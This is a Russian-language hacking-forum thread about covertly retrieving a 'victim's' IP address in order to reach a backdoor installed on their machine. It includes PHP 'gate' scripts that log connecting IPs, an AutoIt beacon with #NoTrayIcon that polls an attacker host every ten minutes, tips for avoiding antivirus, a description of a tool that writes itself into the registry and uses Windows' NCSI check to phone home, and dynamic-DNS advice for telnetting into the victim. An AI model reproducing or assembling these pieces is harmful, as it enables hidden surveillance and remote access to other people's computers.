Внутренний? Кто тебе такое сказал? Зачем тебе внутресетевой айпи? о_О Он нужен только в том случае, если ты подключен к той локальной сети, к которой принадлежит твоя жертва. Тогда можно его использовать для подключения к серверной части backdoor'a. А если подключаться через и-нет, то нужен именно внешний IP.
Sams: ну иконка это не трабл) В начале добавляешь #NoTrayIcon (а про беспалевность я имел ввиду антивири)
Твой скрин с ошибкой не грузиться. Перезалей, если можешь. Извиняюсь, допустил там маленькую ошибку - не поставил кавычки. P.S. И еще подправил режим открытия файла с "w" на "a". PHP: <?php $file = fopen("ip.txt","a"); fwrite($file, $_GET['ip']); fwrite($file, "\r\n"); fclose($file); ?>
не читал все сообщения этой темы, поэтому могу повториться. есть такая штука как ddclient, эта прога связываеться через определенный период с сервером и шлет ей ip, а он в свою очередь присваивает доменное имя. в таком случае обращаться к компу жертвы будешь указывая, в параметрах telnet-клиента то доменное имя, которое присвоил ей при регистрации на dyndns.com (офф.сайт), а не айпи. на винду ее не ставил, но на линуксе она ставиться как два пальца обо... обычно эта тему используют админы чтобы поднять какой-то элементарный сервер на машине с динамическим ip, в твоем случае это то что надо, и кодить не надо. P.S.если ты с жертвой в одной подсети и выходить в инет через один и тотже шлюз, то такая тема не прокатит
Code: Dim objHTTP As Object Set objHTTP = CreateObject("Microsoft.XMLHTTP") Call objHTTP.Open("GET", "http://www.ya.ru/", False) Call objHTTP.Send
Простейшее решение autoit Code: #NoTrayIcon While 1 InetRead("http://HOST/path/page.php") sleep 600000 Wend ЗЫ сори за архиалогию, авось кому пригодится
Просто напиши на чем-угодно меленькую прогу, которая раз в час грузит страницу из вэба :\ (твой сервер, который складирует ip в файл) _UPD оп-оп, на дату не глянул... че-то спать походу надо чаще...
Не троян ( админам) Писал для себя(мы все под колпаком Microsoft ) Отправка IP на гейт Вообщем суть проги такая: Начиная с Vista,Windows 7 существует функция (Network Connectivity Status Indicator (NCSI)) проверки выхода в интернет. (источник: h_ttp://winreview.ru/kakim-obrazom-windows-opredelyaet-nalichie-vyxoda-v-internet/) так почему бы ее не использовать в своих целях. на сервак (сайт) заливаем gate.php PHP: <?php $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $fp = fopen('ip.txt', 'a'); fwrite($fp,' Date and Time:' .$date. ' IP: ' .$ip. "\n"); fclose($fp); ?> 1. вписываем ip сервака 2. адрес сайта 3. путь до гейта (dir/gate.php) собираем получаем .ехе прога прописывает это все в реестр: при выходе в интернет жертва не открывая браузеров подключается к нашему гейту где и оставляет свой айпишник. (gate.php можно дополнить на свое усмотрение) ссылка: тут исходник в архиве Мне кажется если отключить Яву в браузере то айпи не вычислить это плюс конечно, но тогда некоторые шеллы не работают , это минус
В мозиле ставлю прокси выключаю Яву захожу сюда: http://whoer.net/ (в расширенный режим) моего реального IP нет этот сайт проверяет меня по флэш. А теперь вкл. прокси и яву и зайди туда же, в пункте DNS - прокси нажми Да и увидишь свой реальный IP